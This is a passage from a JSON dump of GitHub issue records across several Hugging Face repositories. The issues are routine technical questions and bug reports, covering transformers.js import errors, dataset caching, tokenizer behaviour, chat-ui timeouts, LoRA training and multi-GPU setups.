    "body": "### Question\n\n## Background\nI have developed a chrome extension which is followed by the [example](https://github.com/huggingface/transformers.js/tree/main/examples/extension). The example was used the package @xenova/transformers.\n\n## Motivation\nIt seems that multithreads is work now. [Issue](https://github.com/huggingface/transformers.js/issues/928) [Issue2](https://github.com/huggingface/transformers.js/issues/882)\n\n## Question\nI change the package from **@xenova/transformers@2.17.2** to **@huggingface/transformers@3.4.1**. It shows a error **TypeError: sharp__WEBPACK_IMPORTED_MODULE_4__ is not a function** which have no been shown before. Anyone can help?\n\n## Code (background.js)\n``` \n// import { pipeline, env } from '@xenova/transformers';\n// env.localModelPath = './';\n// env.allowRemoteModels = false;\n// env.backends.onnx.wasm.numThreads = 1;\n\nimport { env, pipeline } from '@huggingface/transformers';\nenv.localModelPath = './';\n\nclass ImagePipelineSingleton {\n    static task = 'image-classification';\n    static model = '/deepfake/';\n    static instance = null;\n\n    static async getInstance() {\n        try {\n            if (this.instance === null) {\n                this.instance = await pipeline(this.task, this.model);\n            }\n        } catch (error) {\n            console.error(\"Initialization error:\", error);\n        }\n        return this.instance;\n    }\n}\n\n...\ntry{\n    let model = await ImagePipelineSingleton.getInstance();\n    let classification = await model(url); \n}catch (error) {\n    console.error(\"image processing error:\", error); //error here\n}\n...\n```\n\n## Folder Structure\n- deepfake\n  - onnx\n    - model_quantized.onnx",
    "url": "https://github.com/huggingface/transformers.js/issues/1259",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-27T07:35:23Z",
    "updated_at": "2025-07-02T04:45:26Z",
    "user": "sanixa"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7480,
    "title": "HF_DATASETS_CACHE ignored?",
    "body": "### Describe the bug\n\nI'm struggling to get things to respect HF_DATASETS_CACHE.\n\nRationale: I'm on a system that uses NFS for homedir, so downloading to NFS is expensive, slow, and wastes valuable quota compared to local disk. Instead, it seems to rely mostly on HF_HUB_CACHE.\n\nCurrent version: 3.2.1dev. In the process of testing 3.4.0\n\n### Steps to reproduce the bug\n\n[Currently writing using datasets 3.2.1dev. Will follow up with 3.4.0 results]\n\ndump.py:\n```python\nfrom datasets import load_dataset\ndataset = load_dataset(\"HuggingFaceFW/fineweb\", name=\"sample-100BT\", split=\"train\")\n```\n\nRepro steps\n```bash\n# ensure no cache\n$ mv ~/.cache/huggingface ~/.cache/huggingface.bak\n\n$ export HF_DATASETS_CACHE=/tmp/roller/datasets\n$ rm -rf ${HF_DATASETS_CACHE}\n$ env | grep HF | grep -v TOKEN\nHF_DATASETS_CACHE=/tmp/roller/datasets\n\n$ python dump.py\n# (omitted for brevity)\n\n# (while downloading) \n$ du -hcs ~/.cache/huggingface/hub\n18G     hub\n18G     total\n\n# (after downloading)\n$ du -hcs ~/.cache/huggingface/hub\n```\n\nIt's a shame because datasets supports s3 (which I could really use right now) but hub does not.\n\n### Expected behavior\n\n* ~/.cache/huggingface/hub stays empty\n* /tmp/roller/datasets becomes full of stuff\n\n### Environment info\n\n[Currently writing using datasets 3.2.1dev. Will follow up with 3.4.0 results]",
    "url": "https://github.com/huggingface/datasets/issues/7480",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-26T17:19:34Z",
    "updated_at": "2025-10-23T15:59:18Z",
    "comments": 8,
    "user": "stephenroller"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1258,
    "title": "Tokenizer encode and decode get different token ids and text, missing word_ids",
    "body": "### Question\n\n```js\nimport { AutoTokenizer } from '@huggingface/transformers';\n\nconst tokenizer = await AutoTokenizer.from_pretrained('deepseek-ai/DeepSeek-R1')\n\nconsole.log(tokenizer.encode(\" e.g., \u2669\"))\nconsole.log(tokenizer.decode([105]))\nconsole.log(tokenizer.encode(\"\u2669\"))\n```\n\n```\n[ 312, 3588, 1042, 30717, 105 ]\n\ufffd\n[ 21315, 105 ]\n```\nhow do I encode the words, and loop it and return it as single token,\nbecause now \u2669 is returning 2 tokens and becoming confusing\n\nso is this a bug or something?\n\n\nI guess i need word_ids?",
    "url": "https://github.com/huggingface/transformers.js/issues/1258",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-26T10:44:12Z",
    "updated_at": "2025-03-31T20:18:45Z",
    "user": "liho00"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 905,
    "title": "Supporting selection of obs and action keys in dataset",
    "body": "Hi all, thanks a lot for the framework.\n\nCurrently, it seems the LeRobotDataset format requires users to have a fixed state/environment state/images or actions defined in their dataset. However, this means that for multiple similar applications, the user has to record different datasets with different state or action definitions.\n\nIs it possible to select certain keys from the state or actions similar to how we can do in robomimic?\n\nhttps://github.com/ARISE-Initiative/robomimic/blob/master/robomimic/config/default_templates/bc_transformer.json#L107-L113",
    "url": "https://github.com/huggingface/lerobot/issues/905",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-26T08:12:10Z",
    "updated_at": "2025-10-10T02:27:27Z",
    "user": "Mayankm96"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1772,
    "title": "USE_LOCAL_WEBSEARCH No results found for this search query",
    "body": "## Bug description\n\nWith `USE_LOCAL_WEBSEARCH=true`, Web Search always reports _No results found for this search query_.\n\n## Steps to reproduce\n\n- enable search\n- enter and submit question\n\n## Screenshots\n\n\"Image\"\n\n## Context\n\nI'm running chat-ui-db using podman on an M1 Macbook. I'm using LM Studio as the model provider.\n\n`podman run --rm --mount type=bind,source=\"$(pwd)/.env.local\",target=/app/.env.local -v chat-ui:/data -p 3000:3000 ghcr.io/huggingface/chat-ui-db`\n\n### Logs\n\n\n\n```\n{\"level\":50,\"time\":1742937489975,\"pid\":18,\"hostname\":\"bbd76a6649ad\",\"msg\":\"No results found for this search query\"}\n```\n\n### Specs\n\n- **OS**: macOS 15.3.1 (24D70)\n- **Browser**: Firefox 136.0.2 (aarch64)\n- **chat-ui commit**: ghcr.io/huggingface/chat-ui-db f679ed220b9b\n\n### Config\n\n_.env.local_\n```\nHF_TOKEN=hf_...\nMODELS=`[\n  {\n    \"name\": \"LM Studio\",\n    \"endpoints\": [{\n      \"type\" : \"openai\",\n      \"baseURL\": \"http://host.docker.internal:1234/v1\"\n    }],\n  },\n]`\nUSE_LOCAL_WEBSEARCH=true\nWEBSEARCH_JAVASCRIPT=true\n```",
    "url": "https://github.com/huggingface/chat-ui/issues/1772",
    "state": "open",
    "labels": [
      "bug",
      "help wanted",
      "websearch"
    ],
    "created_at": "2025-03-25T21:28:11Z",
    "updated_at": "2025-10-22T21:13:54Z",
    "comments": 6,
    "user": "brechtm"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1771,
    "title": "Client disconnects before response is received",
    "body": "## Bug description\n\n\nIf an answer takes several minutes to complete, the chat-ui client simply disconnects. This disconnection happens at 1 minute, but I'm unsure.\n\n## Steps to reproduce\n\nAsk your LLM a riddle but change it a little, so it becomes confused and wonders for a while.\n\nman and a goat are one one side of a river with a boat. How do they get across?\n\nNotice that the response is terminated during thinking/reasoning phase.\n\nThe LM Studio logs indicates that the client disconnects so it terminates the response at that point.\n\n## Screenshots\n\n\n## Context\n\n### Logs\n\n\nThis request is terminated as 1min in the browser.\n```\ncurl 'https://example.com/conversation/67e1af3d9becaf215b19d526' \\\n-X 'POST' \\\n-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywFDiAu9glkYBEPBf' \\\n-H 'Accept: */*' \\\n--data-binary $'------WebKitFormBoundarywFDiAu9glkYBEPBf\\r\\nContent-Disposition: form-data; name=\"data\"\\r\\n\\r\\n{\"id\":\"91f280d4-9852-4453-b941-582eb531e911\",\"is_retry\":true,\"is_continue\":false,\"web_search\":false,\"tools\":[]}\\r\\n------WebKitFormBoundarywFDiAu9glkYBEPBf--\\r\\n'\n```\n\n### Specs\n\n- **OS**: OS X\n- **Browser**: Orion\n- **chat-ui commit**: chat-ui-db image: `ghcr.io/huggingface/chat-ui-db@sha256:a69b02884d0de64bb60d8011828b0e4be778673cadfc5f783fe6df14fa737504`\n\n### Config\n\n\n\n## Notes\n\nHow do I configure these timeouts?",
    "url": "https://github.com/huggingface/chat-ui/issues/1771",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-25T19:14:54Z",
    "updated_at": "2025-06-14T13:46:28Z",
    "comments": 3,
    "user": "drewwells"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7477,
    "title": "What is the canonical way to compress a Dataset?",
    "body": "Given that Arrow is the preferred backend for a Dataset, what is a user supposed to do if they want concurrent reads, concurrent writes AND on-disk compression for a larger dataset?\n\nParquet would be the obvious answer except that there is no native support for writing sharded, parquet datasets concurrently [[1](https://github.com/huggingface/datasets/issues/7047)].\n\nAm I missing something?  \n\nAnd if so, why is this not the standard/default way that `Dataset`'s work as they do in Xarray, Ray Data, Composer, etc.?",
    "url": "https://github.com/huggingface/datasets/issues/7477",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-25T16:47:51Z",
    "updated_at": "2025-04-03T09:13:11Z",
    "user": "eric-czech"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 901,
    "title": "Any tutorial on how to make experiments on the SimXArm enviroment?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/901",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-25T13:29:59Z",
    "updated_at": "2025-03-25T16:42:11Z",
    "user": "chenkang455"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1765,
    "title": "`truncate` parameter ignored for OpenAI chat_completions endpoint",
    "body": "## Bug description\n\nThe `truncate` parameter in the ChatUI configuration is not being applied when using the OpenAI chat_completions endpoint.\n\n## Root Cause\n\nThe issue arises because the chat_completions endpoint does not utilize the buildPrompt function where the `truncate` parameter is handled. The logic for truncation is solely within buildPrompt and is therefore bypassed entirely when processing chat_completions requests. This means there's no truncation mechanism applied to the chat history before it's sent to vllm-openai or OpenAI.\n\n#1654 ",
    "url": "https://github.com/huggingface/chat-ui/issues/1765",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-25T10:13:40Z",
    "updated_at": "2025-03-25T10:20:33Z",
    "comments": 0,
    "user": "calycekr"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 350,
    "title": "how to train wan using 8 GPUs",
    "body": "I notice that there is only 4 GPUs scripts, even though I modify the script for 8 GPU training, it gets some errors.",
    "url": "https://github.com/huggingface/finetrainers/issues/350",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-25T05:02:18Z",
    "updated_at": "2025-05-06T14:54:50Z",
    "user": "tanshuai0219"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11147,
    "title": "[LTX0.9.5] make LTX0.9.5 works with text-to-video",
    "body": "see more context here https://github.com/huggingface/diffusers/issues/11143#issuecomment-2747390564",
    "url": "https://github.com/huggingface/diffusers/issues/11147",
    "state": "closed",
    "labels": [
      "help wanted"
    ],
    "created_at": "2025-03-24T09:56:47Z",
    "updated_at": "2025-04-04T14:43:16Z",
    "comments": 9,
    "user": "yiyixuxu"
  },
  {
    "repo": "huggingface/search-and-learn",
    "number": 47,
    "title": "How to run this project on CPU?",
    "body": "Hello, I'm going to run the code for the project on cpu\n\nThe graphics card I have now is 4060ti, but even with the lightest option (minimum batch size, use 1.5B model, etc.), I couldn't run the project due to memory capacity issues\n\nSo I want to move this project to cpu and see the results even if it takes some time\n\nHowever, even though all settings and codes have been checked, the flash attention backend is automatically set and we are having trouble solving the error\n\nSo I would like to ask if this project cannot be implemented in cpu through vllm setting change only",
    "url": "https://github.com/huggingface/search-and-learn/issues/47",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-24T01:13:44Z",
    "updated_at": "2025-03-24T01:13:44Z",
    "user": "pss0204"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7473,
    "title": "Webdataset data format problem",
    "body": "### Describe the bug\n\nPlease see https://huggingface.co/datasets/ejschwartz/idioms/discussions/1\n\nError code: FileFormatMismatchBetweenSplitsError\n\nAll three splits, train, test, and validation, use webdataset. But only the train split has more than one file. How can I force the other two splits to also be interpreted as being the webdataset format?  (I don't think there is currently a way, but happy to be told that I am wrong.)\n\n### Steps to reproduce the bug\n\n```\nimport datasets\ndatasets.load_dataset(\"ejschwartz/idioms\")\n\n### Expected behavior\n\nThe dataset loads.  Alternatively, there is a YAML syntax for manually specifying the format.\n\n### Environment info\n\n- `datasets` version: 3.2.0\n- Platform: Linux-6.8.0-52-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- `huggingface_hub` version: 0.28.1\n- PyArrow version: 19.0.0\n- Pandas version: 2.2.3\n- `fsspec` version: 2024.9.0",
    "url": "https://github.com/huggingface/datasets/issues/7473",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-21T17:23:52Z",
    "updated_at": "2025-03-21T19:19:58Z",
    "comments": 1,
    "user": "edmcman"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7470,
    "title": "Is it possible to shard a single-sharded IterableDataset?",
    "body": "I thought https://github.com/huggingface/datasets/pull/7252 might be applicable but looking at it maybe not.\n\nSay we have a process, eg. a database query, that can return data in slightly different order each time. So, the initial query needs to be run by a single thread (not to mention running multiple times incurs more cost too). But the results are also big enough that we don't want to materialize it entirely and instead stream it with an IterableDataset.\n\nBut after we have the results we want to split it up across workers to parallelize processing.\n\nIs something like this possible to do?\n\nHere's a failed attempt. The end result should be that each of the shards has unique data, but unfortunately with this attempt the generator gets run once in each shard and the results end up with duplicates...\n\n```\nimport random\nimport datasets\n\n\ndef gen():\n  print('RUNNING GENERATOR!')\n  items = list(range(10))\n  random.shuffle(items)\n  yield from items\n\n\nds = datasets.IterableDataset.from_generator(gen)\n\nprint('dataset contents:')\nfor item in ds:\n  print(item)\nprint()\n\nprint('dataset contents (2):')\nfor item in ds:\n  print(item)\nprint()\n\n\nnum_shards = 3\n\n\ndef sharded(shard_id):\n  for i, example in enumerate(ds):\n    if i % num_shards in shard_id:\n      yield example\n\n\nds1 = datasets.IterableDataset.from_generator(\n  sharded, gen_kwargs={'shard_id': list(range(num_shards))}\n)\n\nfor shard in range(num_shards):\n  print('shard', shard)\n  for item in ds1.shard(num_shards, shard):\n    print(item)\n```",
    "url": "https://github.com/huggingface/datasets/issues/7470",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-21T04:33:37Z",
    "updated_at": "2025-11-22T07:55:43Z",
    "comments": 6,
    "user": "jonathanasdf"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 884,
    "title": "[Question] Support of PointCloud",
    "body": "Hi,  \n\nI'm currently developing a plugin for lerobot and would like to know if there are any plans to support PointCloud data.  \nAdditionally, I'd like to ask if there is a recommended storage format for handling PointCloud data within the project.  \n\nLooking forward to your response.  \n\nThanks",
    "url": "https://github.com/huggingface/lerobot/issues/884",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-21T04:29:15Z",
    "updated_at": "2025-10-07T02:26:39Z",
    "user": "yilin404"
  },
  {
    "repo": "huggingface/inference-benchmarker",
    "number": 4,
    "title": "Can i use local model's tokenizer and local dataset?",
    "body": "Hello, may I specify the paths of the locally downloaded model and dataset through the ./inference-benchmarker command, instead of accessing Hugging Face via the network?",
    "url": "https://github.com/huggingface/inference-benchmarker/issues/4",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-21T01:55:03Z",
    "updated_at": "2025-03-27T18:44:04Z",
    "user": "handsome-chips"
  },
  {
    "repo": "huggingface/video-dataset-scripts",
    "number": 20,
    "title": "parquet file how to convert to Training Dataset Format for finetrainers",
    "body": "parquet file how to convert to Training Dataset Format for finetrainers ?",
    "url": "https://github.com/huggingface/video-dataset-scripts/issues/20",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-20T16:22:39Z",
    "updated_at": "2025-04-10T17:46:06Z",
    "user": "kanghua309"
  },
  {
    "repo": "huggingface/trl",
    "number": 3114,
    "title": "What is the reason for using only one GPU when integration with llm?",
    "body": "At [line](https://github.com/huggingface/trl/blob/main/trl/trainer/grpo_trainer.py#L507)  of the code, when using vllm, a unique GPU device is specified here. However, in fact, it is quite common to use a single vllm instance with multiple GPUs. \n\n1. What is the reason that the code is designed to only select a single GPU? \n2. Where does the '**device**' parameter of this LLM interface eventually get passed to? When I entered this function, I couldn't find the corresponding parameter processing method (this might be a very basic question). \n3. When I changed the '**device**' parameter to **tensor_parallel_size** (and also set the world_size and other parameters), an error occurred. \n\nI've noticed that some other PRs have made modifications to the multi-GPU usage of vllm, but not at the interface where [LLM is used](https://github.com/huggingface/trl/blob/main/trl/trainer/grpo_trainer.py#L507). I'm curious about the reasons behind this. \n\nIf anyone is willing to answer me, I would be very grateful.",
    "url": "https://github.com/huggingface/trl/issues/3114",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-03-19T16:20:03Z",
    "updated_at": "2025-04-05T17:01:33Z",
    "user": "spencergotowork"
  },
  {
    "repo": "huggingface/smollm",
    "number": 67,
    "title": "How to fine tune smolvlm on OCR",
    "body": "Is there any guid to finet-tune smovlm on OCR like in https://huggingface.co/ds4sd/SmolDocling-256M-preview ",
    "url": "https://github.com/huggingface/smollm/issues/67",
    "state": "open",
    "labels": [
      "Image"
    ],
    "created_at": "2025-03-19T14:17:33Z",
    "updated_at": "2025-07-29T13:09:05Z",
    "user": "abdelkareemkobo"
  },
  {
    "repo": "huggingface/peft",
    "number": 2436,
    "title": "Fine-tuning with Multiple LoRAs",
    "body": "Thanks for your valuable work!\n\nI would like to know if it's possible to jointly train two LoRAs while only loading one base model. The overall output depends on the respective outputs of LoRA1 and LoRA2. For example, logits1 is obtained from the base model with LoRA1, and logits2 is obtained from the base model with LoRA2. I have tried the following code\n\n```python\nmodel.add_adapter(lora_1)\nmodel.add_adapter(lora_2)\nmodel.enable_adapters()\n\nmodel.set_adapter(\"lora_1\")\nlogits1 = model(input_ids).logits # use model with lora1 to get output\nmodel.set_adapter(\"lora_2\")\nlogits2 = model(input_ids).logits # use model with lora2 to get output\nlogits = logits1+logits2\nloss=loss_fct(logits, labels)\nloss.backward()\n```\n\nbut it seems there might be some issues:\n1. Once set_adapter(lora2) is called, LoRA1 no longer receives gradients; \n2. If I modify the source code of set_adapter to make both requires_grad=True, would that be correct? \n\nWhat I'm confused about is, after I execute set_adapter(lora2), does the model perform computations using the base model with LoRA2 (as I hope), or does it use the base model with both LoRA1 and LoRA2 combined?\n\nI'm looking forward to your help! Thank you!",
    "url": "https://github.com/huggingface/peft/issues/2436",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-19T13:49:28Z",
    "updated_at": "2025-07-19T05:45:12Z",
    "comments": 7,
    "user": "xymou"
  },
  {
    "repo": "huggingface/setfit",
    "number": 590,
    "title": "How do I disable requests to huggingface.co:443 after training?",
    "body": "I'm currently evaluating setfit in a proof of concept situation. Unfortunately, I'm working behind a company firewall, where I do not have access to the world wide web, only to company-internal URLs.\n\nThat's a bit annoying in terms of downloading models, but I can work around that. More importantly, it seems there are calls to huggingface.co:443 after the training is done, which obviously cannot succeed due to the blocked internet access.\nThat wouldn't be big problem if the timeout were 1 minute or so, but it seems to be more like 5-10 minutes, which is a lot of time wasted just waiting for the results.\n\nHow can I disable these blocking HTTP requests?\n\nMy minimal training pipeline looks somewhat like this (shortened for readability, especially data loading):\n\n```\nmodel = SetFitModel.from_pretrained(\n    \"/local/path/local-bge-small-en-v1.5\",\n    local_files_only=True,\n    multi_target_strategy=\"multi-output\",\n)\ntrain_dataset, test_dataset = a_bunch_of_loading_and_sampling_code_thats_irrelevant_here()\nargs = TrainingArguments(\n    batch_size=128,\n    num_epochs=10,\n    report_to=None\n)\ntrainer = Trainer(\n    model=model,\n    args=args,\n    train_dataset=train_dataset,\n    metric=\"f1\",\n    callbacks=None,\n    column_mapping={\"column\": \"mapping\"},\n    metric_kwargs={\"average\": \"samples\"}\n)\ntrainer.train()\n```\n\nAfter all training steps are done, I get the following console logs:\n```\nINFO:sentence_transformers.trainer:Saving model checkpoint to checkpoints/checkpoint-258\nINFO:sentence_transformers.SentenceTransformer:Save model to checkpoints/checkpoint-258\nRequest [id]: GET https://huggingface.co/api/models/setfit-test/local-bge-small-en-v1.5 (authenticated: False)\nDEBUG:huggingface_hub.utils._http:Request [id]: GET https://huggingface.co/api/models/setfit-test/local-bge-small-en-v1.5 (authenticated: False)\nDEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): huggingface.co:443\n```\nThen nothing happens for about 10 minutes, before I get a \"Batches: 100% [tqdm progress bar]\", which is however finished almost immediately.\n\n\n\nIs there any parameter I can set to disable this call to huggingface? \"report_to=None\" or \"callbacks=None\" don't seem to do the trick.",
    "url": "https://github.com/huggingface/setfit/issues/590",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-19T08:42:12Z",
    "updated_at": "2025-03-19T18:44:12Z",
    "user": "AdrianSchneble"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11114,
    "title": "channel inconsistency in cogvideo Lora training example",
    "body": "### Describe the bug\n\nwhile using the training script in (https://github.com/huggingface/diffusers/blob/main/examples/cogvideo/train_cogvideox_image_to_video_lora.py)\n\nI made a dataset as described in readme and run training.\n\nbut a bug occurred at the forward pass process.It is because the model in-channel is 16 but model_input in-channel is 32.\n\nhow can i fix it?\n\n### Reproduction\n\n                # Sample noise that will be added to the latents\n                noise = torch.randn_like(video_latents)\n\n                # Add noise to the model input according to the noise magnitude at each timestep\n                # (this is the forward diffusion process)\n                noisy_video_latents = scheduler.add_noise(video_latents, noise, timesteps)\n                noisy_model_input = torch.cat([noisy_video_latents, image_latents], dim=2)\n\n                # Prepare rotary embeds\n                image_rotary_emb = (\n                    prepare_rotary_positional_embeddings(\n                        height=args.height,\n                        width=args.width,\n                        num_frames=num_frames,\n                        vae_scale_factor_spatial=vae_scale_factor_spatial,\n                        patch_size=model_config.patch_size,\n                        attention_head_dim=model_config.attention_head_dim,\n                        device=accelerator.device,\n                    )\n                    if model_config.use_rotary_positional_embeddings\n                    else None\n                )\n# Predict the noise residual\n                model_output = transformer(\n                    hidden_states=noisy_model_input,\n                    encoder_hidden_states=prompt_embeds,\n                    timestep=timesteps,\n                    image_rotary_emb=image_rotary_emb,\n                    return_dict=False,\n                )[0]\n\n### Logs\n\n```shell\n[rank0]: File \"train_cogvideox_i_t2v_lora_raw.py\", line 1426, in main\n[rank0]: model_output = transformer(\n[rank0]: ^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n[rank0]: return forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/parallel/distributed.py\", line 1643, in forward\n[rank0]: else self._run_ddp_forward(*inputs, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/parallel/distributed.py\", line 1459, in _run_ddp_forward\n[rank0]: return self.module(*inputs, **kwargs) # type: ignore[index]\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n[rank0]: return forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/accelerate/utils/operations.py\", line 819, in forward\n[rank0]: return model_forward(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/accelerate/utils/operations.py\", line 807, in __call__\n[rank0]: return convert_to_fp32(self.model_forward(*args, **kwargs))\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/amp/autocast_mode.py\", line 44, in decorate_autocast\n[rank0]: return func(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/diffusers/models/transformers/cogvideox_transformer_3d.py\", line 476, in forward\n[rank0]: hidden_states = self.patch_embed(encoder_hidden_states, hidden_states)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n[rank0]: return forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/diffusers/models/embeddings.py\", line 715, in forward\n[rank0]: image",
    "url": "https://github.com/huggingface/diffusers/issues/11114",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-19T07:55:00Z",
    "updated_at": "2025-04-18T15:02:52Z",
    "comments": 2,
    "user": "MrTom34"
  },
  {
    "repo": "huggingface/trl",
    "number": 3109,
    "title": "where is file https://github.com/huggingface/trl/blob/main/trl/scripts/sft.py",
    "body": "### Reproduction\n\n```python\nfrom trl import ...\n\n```\n\noutputs:\n\n```\nTraceback (most recent call last):\n  File \"example.py\", line 42, in \n    ...\n```\n\n\n### System Info\n\nhttps://github.com/huggingface/trl/blob/main/trl/scripts/sft.py\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete",
    "url": "https://github.com/huggingface/trl/issues/3109",
    "state": "closed",
    "labels": [
      "\ud83d\udc1b bug",
      "\ud83c\udfcb SFT"
    ],
    "created_at": "2025-03-19T02:20:26Z",
    "updated_at": "2025-03-19T02:22:23Z",
    "user": "zh794390558"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1245,
    "title": "QuestionAnsweringOutput does not return start/end index",
    "body": "### Question\n\nQuestion/Answering pipeline does not seem to return start/end index.\n\nconsole output example\n\n``` { answer: 'anywhere', score: 0.8719829671013909 }```\n\nsource code in pipeline.js\n``` \nclass QuestionAnsweringPipeline ...\n\n// TODO add start and end?\n// NOTE: HF returns character index\n                toReturn.push({\n                    answer, score\n                });```\n",
    "url": "https://github.com/huggingface/transformers.js/issues/1245",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-18T21:20:25Z",
    "updated_at": "2025-03-18T21:20:25Z",
    "user": "sleep9"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1243,
    "title": "Transformer.js compatibility with Angular17",
    "body": "### Question\n\nI want to add transformer.js in Angular 17 project. Getting several errors can some one guide me how to add transformer.js with Angular project",
    "url": "https://github.com/huggingface/transformers.js/issues/1243",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-18T16:15:30Z",
    "updated_at": "2025-03-24T21:27:11Z",
    "user": "AnuragPant01"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11108,
    "title": "Is there a way to generate a single image using multiple GPUs?",
    "body": "This is related to #2977 and #3392, but I would like to know how to generate a single image using multiple GPUs. If such a method does not exist, I would also like to know if Accelerate's [Memory-efficient pipeline parallelism](https://huggingface.co/docs/accelerate/usage_guides/distributed_inference#memory-efficient-pipeline-parallelism-experimental) can be applied to this.",
    "url": "https://github.com/huggingface/diffusers/issues/11108",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-18T13:43:05Z",
    "updated_at": "2025-05-02T21:00:31Z",
    "comments": 12,
    "user": "suzukimain"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 876,
    "title": "Multiple GPU Training Support",
    "body": "Hi, lerobot team!\n\nThanks for the great work and organized content.\n\nAre there plans to support PyTorch's Distributed Data Parallel (DDP) training in this framework? ",
    "url": "https://github.com/huggingface/lerobot/issues/876",
    "state": "closed",
    "labels": [
      "enhancement",
      "question",
      "stale"
    ],
    "created_at": "2025-03-18T12:44:43Z",
    "updated_at": "2025-10-07T02:26:45Z",
    "user": "kingchou007"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 521,
    "title": "How to use my own dataset in sft?",
